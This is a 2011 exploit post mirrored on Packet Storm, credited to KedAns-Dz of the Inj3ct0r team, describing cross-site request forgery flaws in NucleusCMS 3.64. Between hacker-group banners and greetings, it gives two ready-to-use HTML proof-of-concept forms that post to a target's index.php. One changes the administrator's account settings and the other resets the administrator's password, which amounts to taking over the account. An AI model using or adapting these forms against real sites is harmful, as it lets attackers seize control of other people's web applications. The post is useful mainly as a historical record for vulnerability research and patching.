Lucene search

K
packetstormKedAns-DzPACKETSTORM:101601
HistoryMay 22, 2011 - 12:00 a.m.

NucleusCMS 3.64 Cross Site Request Forgery

2011-05-2200:00:00
KedAns-Dz
packetstormsecurity.com
24
`1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0  
0 _ __ __ __ 1  
1 /' \ __ /'__`\ /\ \__ /'__`\ 0  
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1  
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0  
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1  
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0  
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1  
1 \ \____/ >> Exploit database separated by exploit 0  
0 \/___/ type (local, remote, DoS, etc.) 1  
1 1  
0 [+] Site : 1337day.com 0  
1 [+] Support e-mail : submit[at]1337day.com 1  
0 0  
1 ######################################### 1  
0 I'm KedAns-Dz member from Inj3ct0r Team 1  
1 ######################################### 0  
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1  
  
###  
# Title : NucleusCMS v3.64 Multiple (CSRF) Vulnerabilities  
# Author : KedAns-Dz  
# E-mail : [email protected] ([email protected]) | [email protected]  
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)  
# Web Site : www.1337day.com * www.exploit-id.com * www.09exploit.com  
# Twitter page : twitter.com/kedans  
# platform : php  
# Impact : Remote Cross-Site Request Forgery (Multiple)  
# Tested on : [Windows XP sp3 FR] & [Linux.(Ubuntu 10.10) En] & [Mac OS X 10.6.1] & [BSDi-BSD/OS 4.2]  
###  
# (~) Greetings To : Caddy-Dz (+) JaGo-Dz (+) Dr.Ride (+) All My Friends   
###  
  
# The Vulnerabilities in Page : [../libs/ADMIN.php] << Can Ability Remote Cross-Site Request Forgery  
  
# (!) Exploit & PoC :  
  
#=(1)======[Change Admin Settings :]=======>  
  
<div>  
<h3> Change Admin Settings :</h3>  
<form method="post" action="http://[target]/index.php" name="memberedit"><div>  
<input type="hidden" name="action" value="changemembersettings" />  
<input type="hidden" name="memberid" value="1" />  
<table><tr><td>  
<td><input name="name" value="admin" /></td>  
<td><input name="realname" value="KedAns-Dz" /></td>  
<td><input type="password" name="password" /></td>  
<td><input type="password" name="repeatpassword" /></td>  
<td><input name="email" value="[email protected]" /></td>  
<td><input name="url" value="http://1337day.com" /></td>  
</table></tr></td>  
<input type="submit" value="Submit" onclick="return checkSubmit();" />  
</form>  
</div>  
  
  
#=(2)======[Change Admin password :]=======>  
  
<div>  
<h3> Change Admin Password :</h3>  
<form action="http://[target]/index.php" method="post">  
<input type="hidden" name="action" value="activatesetpwd" />  
<input type="hidden" name="key" value="1" />  
<table><tr>  
<td><input type="password" name="password" /></td>  
<td><input type="password" name="repeatpassword" /></td>  
</tr></table>  
<td><input type='submit' value='Submit' /></td>  
</form>  
</div>  
  
# (^_^) ! Good Luck ALL ...  
  
#================[ Exploited By KedAns-Dz * HST-Dz * ]===========================================   
# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS > Islampard + Z4k1-X-EnG + Dr.Ride  
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com)   
# Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * ZoRLu  
# gunslinger_ * Sn!pEr.S!Te * anT!-Tr0J4n * ^Xecuti0N3r 'www.1337day.com/team' ++ .... * Str0ke  
# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * TreX (hotturks.org)  
# JaGo-Dz (sec4ever.com) * CEO (0nto.me) * PaCketStorm Team (www.packetstormsecurity.org)  
# www.metasploit.com * UE-Team (www.09exploit.com) * All Security and Exploits Webs ...  
# -+-+-+-+-+-+-+-+-+-+-+-+={ Greetings to Friendly Teams : }=+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-  
# (D) HaCkerS-StreeT-Team (Z) | Inj3ct0r | Exploit-ID | UE-Team | PaCket.Storm.Sec TM | Sec4Ever   
# h4x0re-Sec | Dz-Ghost | INDONESIAN CODER | HotTurks | IndiShell | D.N.A | DZ Team | Milw0rm  
# Indian Cyber Army | MetaSploit | BaCk-TraCk | AutoSec.Tools | HighTech.Bridge SA | Team DoS-Dz  
#================================================================================================  
`